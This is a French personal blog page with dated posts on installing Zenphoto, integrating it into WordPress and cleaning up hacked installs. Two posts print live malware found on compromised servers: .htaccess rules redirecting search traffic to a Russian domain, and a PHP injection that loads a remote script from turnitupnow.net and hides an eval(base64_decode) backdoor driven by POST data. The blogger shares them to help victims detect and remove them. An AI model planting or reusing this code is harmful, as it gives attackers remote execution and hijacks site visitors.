zenphoto

01-03-2012

Intégration de Zenphoto 1.4.2.1 dans WordPress 3.3.1 terminé

Objectif:
Intégration de Zenphoto 1.4.2.1 dans WordPress 3.3.1

Version WordPress: 3.3.1 officielle + fichiers de traduction
Version ZenPhoto: 1.4.2.1
Version Plugin ZenPhotoPress:1.7.5.1 (lien)

Les Etapes:

1 – Installation de wordpress à la racine du domaine www.avenirdudahon.fr
2 – Installation de zenphoto dans un sous dossier du domaine www.avenirdudahon.fr/photos
3 – Téléchargement du plugin zenphotopress à partir de l’adinistration des extensions wordpress
4 – Configuration des url de l’album (Administration de wordpress => Réglages => zenphotoPress
- la valeur que j’ai mis => http://www.avenirdudahon.fr/photos
- le lien zp-data
5 – insertion des photos à l’aide du popup de la page d’ajout d’article …

Problème rencontré:
Cannot read Zenphoto configuration file

J’avais oublié de mettre zp-data à la fin du deuxième champ (précipitation)…

Je crois que je vais quand même faire une intégration complète de la galerie car cette solution renvoi les liens des miniatures vers l’album zenphot, alors que je voudrais que zenphoto fasse partie intégrante d’une page wordpress que j’aurais choisis.

01-03-2012

Intégration de Zenphoto 1.4.2.1 dans WordPress 3.3.1 ce soir

Et oui ce soir je vais faire l’ Intégration de Zenphoto 1.4.2.1 dans WordPress 3.3.1 donc sur les dernières versions à ce jour

Mon coeur bascule entre une intégration brute ou bien l’utilisation du plugin zenphotopress

à suivre ;)

Pour la suite c’est ici
http://www.zenbien.com/integration-de-zenphoto-1-4-2-1-dans-wordpress-3-3-1-termine

31-01-2012

w47631836w.php attention => faille zenphoto tiny mce=> congatarcxisi.ru

Bon la meilleure solution est de laisser ses photos du dossier albums, de supprimer le reste d’envoyer une version corrigée de zenphoto …

Pour bloquer rapidement l’acces à vos pages:
dans le fichier .htaccess mettez:

<Limit GET POST>
require valid-user
</Limit>

Fichiers trouvés sur le serveur
w47631836w.php

Codes malicieux…
.htaccess
RewriteRule ^(.*)$ http://congatarcxisi.ru/mays/index.php

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|
twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|
amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|
libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

sm6ek0.php
pillscasta.com

9 Commentaires

30-11-2011

Hack turnitupnow plugin zenphoto …

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11";

Et oui une faille de sécurité provenant d’un plugin Zenphoto… Tiny_MCE exactement, existant sur certains plugins wordpress aussi:

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}

}

Conséquences.
- Tous vos fichiers php de votre serveur se voient rajouter un code malicieux
- Création de fichier tmp_… infectés

Solutions:

- supprimer l’extension Tiny_MCE de votre répertoire zenphoto
- éditer tous les fichiers php infectés pour retirer les codes (la galère)

Vous croyez vraiment que je vais éditer les milliers de fichiers !!

Et ben non, un petit mélange de perl regex et de find et hop !!

Code utiles

//on trouve les fichiers infectés
root@…:/home# grep -R turnitupnow * | more

//les fichiers tmp_…
updatedb
locate tmp_*

Liens
http://www.zenphoto.org/trac/ticket/2005
http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does

03-05-2011

zenphoto 1.4.x sur free

Une installation rapide et réussi (à ce jour…) sur serveur free en 3 étapes, ça prend 2mn sans le temps d’upload sur le serveur

Mes modifs:
- édition du fichier setup.php et du fichier setup-sqlform
- retrait des messages ….
- redirection javascript pour sauter les étapes de clic …
- edition du fichier .htaccess (activation php5)
- ajout du dossier de sessions

Etapes d’installation:
1- Décompressez et envoyez sur le serveur le fichier zip suivant (le dossier cible doit être vide…):
http://www.progs.fr/files/zenphoto-1.4.0.4-free.zip

2- allez à la racine de votre installation zenphoto et saisissez votre mot de passe free, cliquez sur enregistrer et attendez.

3- saisissez un nom de login et un mot de passe, mail si vous voulez

20 Commentaires

03-05-2011

zenphoto 1.4.x sur free dans 5mn

Et oui attendez encore quelques minutes et vous aurez une version compatible pour free installable en moins de 5mn chrono en mains

j’ai bien dis dans 5mn pas en 5mn (ça vous prendra moins que ça !!)

03-05-2011

zenphoto 1.4 sur free erreur 500

Lors d’une installation de zenphoto 1.4.x il y a de fortes chance que vous tombiez sur un message erreur 500…

Solutions:

- Supprimez les fichiers dans le dossier zp-data (rafraîchissez l’affichage du contenu si besoin)
- Editez le fichier .htaccess à la racine du site et mettez uniquement le code suivant dedans (activation php 5)

php 1

Allez à la racine du site et rafraîchissez la page pour relancer l’installation (F5), renouveler F5 si nécessaire

02-05-2011

problème transfert sur free

Il arrive que les fichiers soient corrompus ou bien que le transfert soit trop long sur free.

Ma solution:
envoyer les fichiers zippés puis ensuite les décompresser avec un script php.
cette solution est bien pratique pour des applications comme wordpress, zenphoto etc…

Pour la partie décompression voir mon autre article traitant du sujet
http://www.zenbien.com/unzip-sur-free

02-05-2011

zenphoto free warning session start

Mettez un dossier nommé sessions à la racine de votre site
supprimez le contenu de zp-data si vous voulez relancer l’installation

Bon en même temps si c’est une première installation voyez si php 5 est activé …

fichier info.php

<?php
phpinfo();
?>

Si vous voyez afficher php 4 alors mettez un fichier .htaccess à la racine de votre site avec le code suivant dedans

php 1

15-04-2011

zenphoto mot de passe

Pour changer votre mot de passe

lien votresite//zp-core/admin.php

Saisissez votre identifiant et le code captcha dessous et cliquez sur Se connecter

Si vous avez oublié votre identifiant, vous pouvez toujours regarder dans la table zp_administrator (phpmyadmin)

Vérifiez en même temps le champ email …

Vous allez par la suite reçevoir un mail avec un lien pour changer votre mot de passe

2 Commentaires